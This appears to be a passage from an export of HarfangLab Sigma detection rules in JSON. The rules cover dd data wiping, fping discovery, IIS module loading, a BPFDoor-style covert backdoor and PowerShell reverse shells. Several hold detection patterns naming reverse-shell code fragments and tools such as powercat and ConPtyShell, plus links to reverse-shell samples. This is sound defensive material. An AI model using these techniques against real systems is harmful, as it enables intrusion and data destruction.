"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.475670Z",
"creation_date": "2026-03-23T11:45:34.624029Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624033Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man1/dd.1.html",
"https://attack.mitre.org/techniques/T1485/",
"https://attack.mitre.org/techniques/T1027/001/"
],
"name": "t1485_suspicious_dd_usage_linux.yml",
"content": "title: Suspicious Usage of dd (Linux)\nid: 2650626f-6d1c-4193-b47e-4a0e51549c76\ndescription: |\n Detects the execution of dd with /dev/zero, /dev/random or /dev/urandom as its input file.\n This could be used by an attacker to either securely delete a file from the disk or to achieve mass data destruction.\n It can also be used as a binary padding technique to add junk data and change the on-disk representation of a file.\n It is recommended to analyze the process calling dd to look for other malicious actions or content.\nreferences:\n - https://man7.org/linux/man-pages/man1/dd.1.html\n - https://attack.mitre.org/techniques/T1485/\n - https://attack.mitre.org/techniques/T1027/001/\ndate: 2021/09/24\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1485\n - attack.defense_evasion\n - attack.t1027.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Dd\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.Deletion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n # /usr/bin/dd\n # /usr/lib/klibc/bin/dd\n Image|endswith: '/dd'\n CommandLine|contains:\n - 'if=/dev/zero'\n - 'if=/dev/random'\n - 'if=/dev/urandom'\n ParentImage|contains: '?'\n\n exclusion_commandline:\n CommandLine|contains:\n - ' status=progress'\n - ' conv='\n\n exclusion_initfs:\n CommandLine|contains: 'of=/var/tmp/mkinitramfs_*/.random-seed'\n\n exclusion_cron:\n Ancestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n\n exclusion_apt:\n Ancestors|contains: '|/usr/bin/apt|'\n\n exclusion_dpkg:\n Ancestors|contains: '|/usr/bin/dpkg|'\n\n exclusion_apt-compat:\n CommandLine: 'dd if=/dev/urandom bs=2 count=1'\n ParentCommandLine: '/bin/sh /etc/cron.daily/apt-compat'\n\n exclusion_cron_hourly:\n ParentCommandLine|startswith: '/bin/sh /etc/cron.hourly/'\n CommandLine: 'dd if=/dev/urandom bs=2 count=1'\n\n exclusion_filebeat:\n ParentCommandLine: '/bin/bash */config/filebeat-* test'\n\n exclusion_yocto_sdk:\n Image: '/opt/yocto/*/usr/bin/dd'\n\n exclusion_cronapt:\n - ParentCommandLine: '/bin/sh /usr/sbin/cron-apt'\n - GrandparentCommandLine: '/bin/sh /usr/sbin/cron-apt'\n\n exclusion_netflow:\n CommandLine: 'dd bs=18 count=1 if=/dev/urandom'\n ParentCommandLine: '/bin/bash -ue .command.run'\n\n exclusion_leapp:\n - ParentCommandLine|startswith:\n - '/usr/bin/python2 /bin/leapp '\n - '/usr/bin/python2 /usr/bin/leapp '\n - '/usr/libexec/platform-python /bin/leapp '\n - '/usr/libexec/platform-python /usr/bin/leapp '\n - CurrentDirectory|startswith: '/usr/share/leapp-repository/repositories/system_upgrade/common/actors/'\n\n exclusion_rust:\n GrandparentCommandLine|endswith: '/.rustup/toolchains/stable-x86_64-unknown-linux*/bin/cargo'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_commvault:\n - Ancestors|contains: '|/opt/commvault/Base64/cvflock|'\n - CommandLine: 'dd if=/dev/urandom bs=1 count=32'\n ParentCommandLine|startswith:\n - '/bin/sh /opt/commvault/Base/Galaxy '\n - '/bin/sh /opt/commvault?/Base/Galaxy '\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2650626f-6d1c-4193-b47e-4a0e51549c76",
"rule_name": "Suspicious Usage of dd (Linux)",
"rule_description": "Detects the execution of dd with /dev/zero, /dev/random or /dev/urandom as its input file.\nThis could be used by an attacker to either securely delete a file from the disk or to achieve mass data destruction.\nIt can also be used as a binary padding technique to add junk data and change the on-disk representation of a file.\nIt is recommended to analyze the process calling dd to look for other malicious actions or content.\n",
"rule_creation_date": "2021-09-24",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.impact"
],
"rule_technique_tags": [
"attack.t1027.001",
"attack.t1485"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "268199bf-94d2-43fe-aa0c-677157a424c0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612240Z",
"creation_date": "2026-03-23T11:45:34.612244Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612252Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.kali.org/tools/fping/",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_fping.yml",
"content": "title: Fping Execution\nid: 268199bf-94d2-43fe-aa0c-677157a424c0\ndescription: |\n Detects the execution of fping, a ping-like tool that uses the Internet Control Message Protocol (ICMP) to discover active devices within a network.\n Attackers may use it during discovery phase to discover remote systems.\n It is recommended to investigate other actions taken by this user in their session.\nreferences:\n - https://www.kali.org/tools/fping/\n - https://attack.mitre.org/techniques/T1018/\ndate: 2022/12/23\nmodified: 2026/02/27\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Tool.Fping\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/fping'\n ParentImage|contains: '?'\n\n exclusion_zabbix:\n - ParentImage: '/usr/sbin/zabbix_server'\n - GrandparentImage:\n - '/usr/sbin/zabbix_server'\n - '/usr/sbin/zabbix_proxy'\n - '/usr/sbin/zabbix_server_mysql'\n - '/usr/sbin/zabbix_server_pgsql'\n - '/usr/sbin/zabbix_proxy_mysql'\n - '/usr/sbin/zabbix_proxy_pgsql'\n - ParentCommandLine:\n - 'sh -c /usr/bin/fping -C3 -i0 2>&1 &1 |]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\inetpub\\\\wwwroot\\\\bin\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\inetpub\\\\temp\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\[[:print:]&&[^/:\\*\\?\\\"<>|]]+\\\\bin\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n LibraryType: 'Native'\n AgentVersion|gte|version: 4.3 # Starting this version, managed/native DLL are both considered and are not detected the same way. See 0ae4376f-360f-4b97-9b3f-4c735a82fbf6 for previous variant.\n\n filter_legitimate_common_modules_bypath:\n ImageLoaded:\n - '?:\\Windows\\System32\\inetsrv\\authanon.dll'\n - '?:\\Windows\\System32\\inetsrv\\authbas.dll'\n - '?:\\Windows\\System32\\inetsrv\\authcert.dll'\n - '?:\\Windows\\System32\\inetsrv\\authmap.dll'\n - '?:\\Windows\\System32\\inetsrv\\authmd5.dll'\n - '?:\\Windows\\System32\\inetsrv\\authsspi.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachfile.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachhttp.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachtokn.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachuri.dll'\n - '?:\\Windows\\System32\\inetsrv\\cgi.dll'\n - '?:\\Windows\\System32\\inetsrv\\compdyn.dll'\n - '?:\\Windows\\System32\\inetsrv\\compstat.dll'\n - '?:\\Windows\\System32\\inetsrv\\custerr.dll'\n - '?:\\Windows\\System32\\inetsrv\\defdoc.dll'\n - '?:\\Windows\\System32\\inetsrv\\diprestr.dll'\n - '?:\\Windows\\System32\\inetsrv\\dirlist.dll'\n - '?:\\Windows\\System32\\inetsrv\\filter.dll'\n - '?:\\Windows\\System32\\inetsrv\\gzip.dll'\n - '?:\\Windows\\System32\\inetsrv\\iis_ssi.dll'\n - '?:\\Windows\\System32\\inetsrv\\iiscore.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisetw.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisfcgi.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisfreb.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisreqs.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisres.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisutil.dll'\n - '?:\\Windows\\System32\\inetsrv\\iiswsock.dll'\n - '?:\\Windows\\System32\\inetsrv\\iprestr.dll'\n - '?:\\Windows\\System32\\inetsrv\\isapi.dll'\n - '?:\\Windows\\System32\\inetsrv\\logcust.dll'\n - '?:\\Windows\\System32\\inetsrv\\loghttp.dll'\n - '?:\\Windows\\System32\\inetsrv\\modrqflt.dll'\n - '?:\\Windows\\System32\\inetsrv\\nativerd.dll'\n - '?:\\Windows\\System32\\inetsrv\\protsup.dll'\n - '?:\\Windows\\System32\\inetsrv\\redirect.dll'\n - '?:\\Windows\\System32\\inetsrv\\rewrite.dll'\n - '?:\\Windows\\System32\\inetsrv\\static.dll'\n - '?:\\Windows\\System32\\inetsrv\\validcfg.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3dt.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3tp.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3wphost.dll'\n - '?:\\Windows\\System32\\inetsrv\\warmup.dll'\n - '?:\\Windows\\System32\\inetsrv\\wbhst_pm.dll'\n\n filter_signed_imageloaded:\n Signed: 'true'\n SignatureStatus: 'Valid'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n\n exclusion_legitimate_ms_safehtml:\n Company: 'Microsoft Corporation'\n Description: 'Microsoft SafeHtml filter'\n InternalName: 'osafehtm'\n Product:\n - 'Microsoft SafeHtml'\n - '*Exchange - For Testing Purposes Only*'\n ImageLoaded|endswith: '\\osafehtm.dll'\n\n exclusion_legitimate_bo_crystalreports:\n Company: 'Business Objects'\n LegalCopyright|endswith: 'Business Objects'\n Product|startswith: 'Crystal Reports'\n ImageLoaded|endswith:\n - '\\CrystalDecisions.CrystalReports.Engine.dll'\n - '\\CrystalDecisions.ReportSource.dll'\n - '\\CrystalDecisions.Shared.dll'\n - '\\CrystalDecisions.Web.dll'\n\n exclusion_legitimate_ge_healtcare:\n Company: 'GE Healthcare'\n Product|startswith: 'Dicom'\n ImageLoaded|endswith: '\\DicomFileParser.dll'\n\n exclusion_legitimate_infor_mingle:\n Company: 'Infor'\n Description: 'Infor.Mingle Extension Module for IIS'\n ImageLoaded|endswith: '\\Infor.Mingle.IISModule.dll'\n\n exclusion_legitimate_zedoc:\n Company: 'BSV'\n Description|startswith: 'BSV.'\n InternalName|startswith: 'BSV.'\n ImageLoaded|endswith: '\\bin\\BSV.Videocodage.dll'\n\n exclusion_legitimate_mysqladonet:\n Company: 'MySQL AB'\n Description|startswith: 'MySql.'\n InternalName|startswith: 'MySql.'\n LegalCopyright|endswith: ', MySQL AB'\n ImageLoaded|endswith: '\\bin\\MySql.Data.dll'\n\n exclusion_legitimate_stripheaders:\n ImageLoaded: '?:\\Windows\\System32\\inetsrv\\stripheaders.dll'\n sha256:\n - 'ce3698854f86e1c18f7926d57aec9a6fdba633341a128bec799698e76ef8e144'\n - '16151bbbe127469a0aab8ce7f4f954a2e585201f7d27f8ab7895a62b60f056a9'\n\n exclusion_legitimate_webdav:\n ImageLoaded: '?:\\Windows\\System32\\inetsrv\\webdav.dll'\n sha256:\n - 'fdddf849ba5c8de2f8df9650ab32578e0e74ed607f741013fa50058206b811bf'\n - '94003c985396df6f422d4ad99651a66aee401f9846ed80f82f66f2db77b3391f'\n - '53b61306ed62687b5aeeb380cda96d8a70641d4f1ab58edc26978a181d7fe1d0'\n - '8e430996c1ec91f8ef6d1b10017ad18eddde3027574cafdeb6e42e90bce516e6'\n\n exclusion_legitimate_freeimage:\n Company: 'FreeImage'\n Signed: 'true'\n SignatureStatus: 'Valid'\n Signature: 'Soft Gold ltd'\n\n exclusion_textcontrol:\n ImageLoaded: '?:\\inetpub\\wwwroot\\bin\\tx??_*.dll'\n Company: 'Text Control GmbH'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nfalsepositives:\n - Some web applications legitimately requires the loading of an unsigned library server-wide.\nlevel: medium\n# level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "29dfc6e6-c42a-4009-8e21-367675f7e417",
"rule_name": "Suspicious IIS Module Loaded",
"rule_description": "Detects the loading of a suspicious (native) library by an IIS worker process in system-wide IIS binary module directories.\nMalicious DLLs loaded by an IIS worker can be used for different purposes, mostly to act as webshells.\nIt is recommended to analyze the content of the loaded library to look for malicious content and to analyze subprocesses of the IIS worker for malicious behavior.\n",
"rule_creation_date": "2025-01-28",
"rule_modified_date": "2026-01-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1505.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2a006be4-b10c-4a12-ab2f-98057371169c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620176Z",
"creation_date": "2026-03-23T11:45:34.620178Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620182Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor",
"https://nikhilh-20.github.io/blog/cbpf_bpfdoor/",
"https://github.com/gwillgues/BPFDoor",
"https://www.fortinet.com/blog/threat-research/new-ebpf-filters-for-symbiote-and-bpfdoor-malware",
"https://attack.mitre.org/techniques/T1205/001/"
],
"name": "t1205_001_possible_cbpf_covert_backdoor.yml",
"content": "title: Possible Classic BPF Triggered Covert Backdoor\nid: 2a006be4-b10c-4a12-ab2f-98057371169c\ndescription: |\n Detects Classic BPF program loaded with instructions commonly used by malwares.\n Threat actors can abuse Classic BPF by attaching highly selective packet-filter programs to raw sockets so their implants only wake up when specially crafted “magic” traffic appears, drastically reducing noise and detection opportunities.\n Because Classic BPF executes inside the kernel, it lets malicious tools inspect all inbound packets—even those not addressed to the malicious process—while remaining lightweight and difficult for defenders to notice.\n Attackers can then use BPF’s filtering to covertly trigger backdoor functionality or communication channels without exposing obvious network listeners or suspicious traffic patterns.\n Finally, they may pair BPF with firewall or routing manipulation to hijack existing flows or redirect traffic in ways that appear legitimate to normal monitoring tools.\n It is recommended to check the process which loaded the Classic BPF program for suspicious activities.\nreferences:\n - https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor\n - https://nikhilh-20.github.io/blog/cbpf_bpfdoor/\n - https://github.com/gwillgues/BPFDoor\n - https://www.fortinet.com/blog/threat-research/new-ebpf-filters-for-symbiote-and-bpfdoor-malware\n - https://attack.mitre.org/techniques/T1205/001/\ndate: 2025/08/11\nmodified: 2026/01/22\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.defense_evasion\n - attack.t1205.001\n - attack.t1205.002\n - classification.Linux.Source.Bpf\n - classification.Linux.Behavior.CommandAndControl\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n product: linux\n category: bpf_event\ndetection:\n selection:\n Kind: 'cbpf_load'\n BpfDump|contains|all:\n # ldh [0xc] : Get the \"EtherType\" field at offset 0xc\n - '280000000c000000'\n # jeq 0x800, ??? : if EtherType == IPv4 (0x800), jump\n - '15000????0080000'\n # ldh [0x14] : Get the \"Fragment Offset\" of the IPv4 header\n # jset 0x1fff, ?? : Compare the Fragment Offset value with 0x1fff\n - '2800000014000000450?????ff1f0000'\n # ldb [0x17] : Get the protocol field at offset 0x17 in the IPv4 header\n - '3000000017000000'\n # ldxb 4*([14]&0xf) : Loads a byte from offset 14 and perform various operations\n # to get the total size of the IPv4 header\n - 'b10000000e000000'\n InstructionCount|gte: 15\n\n exclusion_networking_tools:\n Image:\n # tcpdump\n - '/usr/bin/tcpdump'\n - '/usr/sbin/tcpdump'\n - '/usr/local/bin/tcpdump'\n - '/usr/bin/dumpcap'\n # nmap\n - '/usr/local/bin/nmap'\n - '/opt/domotz/bin/domotz_nmap'\n - '/usr/lib/nmap/nmap'\n # openvas\n - '*/sbin/openvas'\n - '*/sbin/openvassd'\n - '/opt/detect/sbin/openvassd'\n # dhclient\n - '/sbin/dhclient'\n - '/usr/sbin/dhclient'\n - '/usr/local/dhcp_probe/bin/dhcp_probe'\n # nessusd\n - '/opt/nessus/sbin/nessusd'\n # vdcm\n - '/opt/vdcm/libexec/DCM_IO'\n # dhcp\n - '/usr/sbin/kea-dhcp4'\n - '/opt/kea/sbin/kea-dhcp4'\n - '/usr/sbin/dhcpd'\n # radsniff\n - '/usr/bin/radsniff'\n # dns\n - '*/bin/dnstop'\n # tracerout\n - '/usr/bin/tcptraceroute.mt'\n # port-knock server \n - '*/sbin/knockd'\n\n exclusion_containers:\n ProcessAncestors|contains:\n - '/bin/containerd-shim'\n - '|/usr/bin/lxc-start'\n\n exclusion_security_tools:\n Image:\n - '/opt/endpoint-agent/agent' # Sekoia\n - '/usr/share/auditbeat/bin/auditbeat'\n - '/usr/bin/suricata'\n\n exclusion_fingerbank:\n Image : '/usr/local/fingerbank/collector/fingerbank-collector'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2a006be4-b10c-4a12-ab2f-98057371169c",
"rule_name": "Possible Classic BPF Triggered Covert Backdoor",
"rule_description": "Detects Classic BPF program loaded with instructions commonly used by malwares.\nThreat actors can abuse Classic BPF by attaching highly selective packet-filter programs to raw sockets so their implants only wake up when specially crafted “magic” traffic appears, drastically reducing noise and detection opportunities.\nBecause Classic BPF executes inside the kernel, it lets malicious tools inspect all inbound packets—even those not addressed to the malicious process—while remaining lightweight and difficult for defenders to notice.\nAttackers can then use BPF’s filtering to covertly trigger backdoor functionality or communication channels without exposing obvious network listeners or suspicious traffic patterns.\nFinally, they may pair BPF with firewall or routing manipulation to hijack existing flows or redirect traffic in ways that appear legitimate to normal monitoring tools.\nIt is recommended to check the process which loaded the Classic BPF program for suspicious activities.\n",
"rule_creation_date": "2025-08-11",
"rule_modified_date": "2026-01-22",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1205.001",
"attack.t1205.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2a2ab0d4-c555-4e90-b3f0-e8025296440a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296703Z",
"creation_date": "2026-03-23T11:45:35.296705Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296710Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/t0mbombadil/TOOLS/blob/master/Exfiltration/ReverseShellSamples.ps1",
"https://github.com/besimorhino/powercat",
"https://github.com/antonioCoco/ConPtyShell",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_reverse_shell_powershell.yml",
"content": "title: PowerShell Reverse Shell Executed\nid: 2a2ab0d4-c555-4e90-b3f0-e8025296440a\ndescription: |\n Detects suspicious reverse shell execution via PowerShell.\n A reverse shell is shell session that is initiated from a remote machine.\n Attackers often use reverse shell to bypass firewalls restrictions.\n It is recommended to analyze the PowerShell script content as well as to look for malicious processes and actions stemming from the PowerShell process.\nreferences:\n - https://github.com/t0mbombadil/TOOLS/blob/master/Exfiltration/ReverseShellSamples.ps1\n - https://github.com/besimorhino/powercat\n - https://github.com/antonioCoco/ConPtyShell\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/07/01\nmodified: 2026/03/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.command_and_control\n - attack.t1095\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.RemoteShell\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_command1:\n PowershellCommand|contains|all:\n - 'Net.Sockets.TCPClient'\n - '.GetStream('\n - '.Read('\n - '.GetString('\n\n selection_command2:\n # https://podalirius.net/fr/reverse-shells/windows-reverse-shells-cheatsheet/\n PowershellCommand|contains|all:\n - 'New-Object -TypeName System.Text.ASCIIEncoding).GetString('\n - '(pwd).Path'\n - '([Text.Encoding]::ASCII).GetBytes('\n\n selection_cmdlet:\n PowershellCommand|contains:\n # https://github.com/besimorhino/powercat\n - 'powercat '\n # https://github.com/antonioCoco/ConPtyShell\n - 'Invoke-ConPtyShell '\n\n exclusion_bmc:\n ProcessParentCommandLine: '?:\\Program Files\\BMC Software\\BladeLogic\\RSCD\\/RSCD.exe'\n PowershellCommand|contains|all:\n - 'Opening the socket from $sourceIP'\n - 'tConnected !'\n\n exclusion_defender:\n PowershellScriptPath: '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Downloads\\PSScript_{????????-????-????-????-????????????}.ps1'\n PowershellCommand|contains:\n - '[void]$socket.ConnectAsync($RemoteIP, $RemotePort).Wait(200)'\n - '$TcpSocket = New-Object Net.Sockets.TcpClient -ErrorAction SilentlyContinue'\n - '$SslStream = New-Object Net.Security.SslStream $TcpClient.GetStream()'\n - '$ProtocolNames= @(\"ssl2\",\"ssl3\",\"tls\",\"tls11\",\"tls12\")'\n\n exclusion_icinga:\n - PowershellScriptPath: '?:\\Program Files\\WindowsPowerShell\\Modules\\icinga-powershell-framework\\cache\\framework_cache.psm1'\n - ProcessParentImage: '?:\\Program Files\\ICINGA2\\sbin\\icinga2.exe'\n - PowershellCommand|contains|all:\n - 'https://github.com/Icinga/icinga-powershell-framework'\n - 'function Get-IcingaDirectorSelfServiceConfig()'\n\n exclusion_opsramp:\n PowershellScriptPath|startswith: '?:\\Program Files (x86)\\OpsRamp\\Agent\\'\n\n exclusion_lpar2rrd:\n PowershellCommand|contains|all:\n - '## lpar2rrd-agent.ps1'\n - '# implementation notes for daemon on lpar2rrd server side'\n\n exclusion_synology_backup:\n # $b64 = \"QhAABmFjdGlvbhAAD3Rlc3RfY29ubmVjdGlvbkA=\"\n # Command sent to the backup server to test the connection.\n - PowershellCommand|contains: '$b64 = \"QhAABmFjdGlvbhAAD3Rlc3RfY29ubmVjdGlvbkA=\"'\n - ProcessCommandLine|contains:\n - 'JABiADYANAAgAD0AIAAiAFEAaABBAEEAQgBtAEYAagBkAEcAbAB2AGIAaABBAEEARAAzAFIAbABjADMAUgBmAFkAMgA5AHUAYgBtAFYAagBkAEcAbAB2AGIAawBBAD0A'\n - 'QAYgA2ADQAIAA9ACAAIgBRAGgAQQBBAEIAbQBGAGoAZABHAGwAdgBiAGgAQQBBAEQAMwBSAGwAYwAzAFIAZgBZADIAOQB1AGIAbQBWAGoAZABHAGwAdgBiAGsAQQA9A'\n - 'kAGIANgA0ACAAPQAgACIAUQBoAEEAQQBCAG0ARgBqAGQARwBsAHYAYgBoAEEAQQBEADMAUgBsAGMAMwBSAGYAWQAyADkAdQBiAG0AVgBqAGQARwBsAHYAYgBrAEEAPQ'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2a2ab0d4-c555-4e90-b3f0-e8025296440a",
"rule_name": "PowerShell Reverse Shell Executed",
"rule_description": "Detects suspicious reverse shell execution via PowerShell.\nA reverse shell is shell session that is initiated from a remote machine.\nAttackers often use reverse shell to bypass firewalls restrictions.\nIt is recommended to analyze the PowerShell script content as well as to look for malicious processes and actions stemming from the PowerShell process.\n",
"rule_creation_date": "2022-07-01",
"rule_modified_date": "2026-03-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1095"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2a2b0d94-09c6-4f43-8904-7c9d3a1ab4fb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071468Z",
"creation_date": "2026-03-23T11:45:34.071470Z",
"enabled": true,
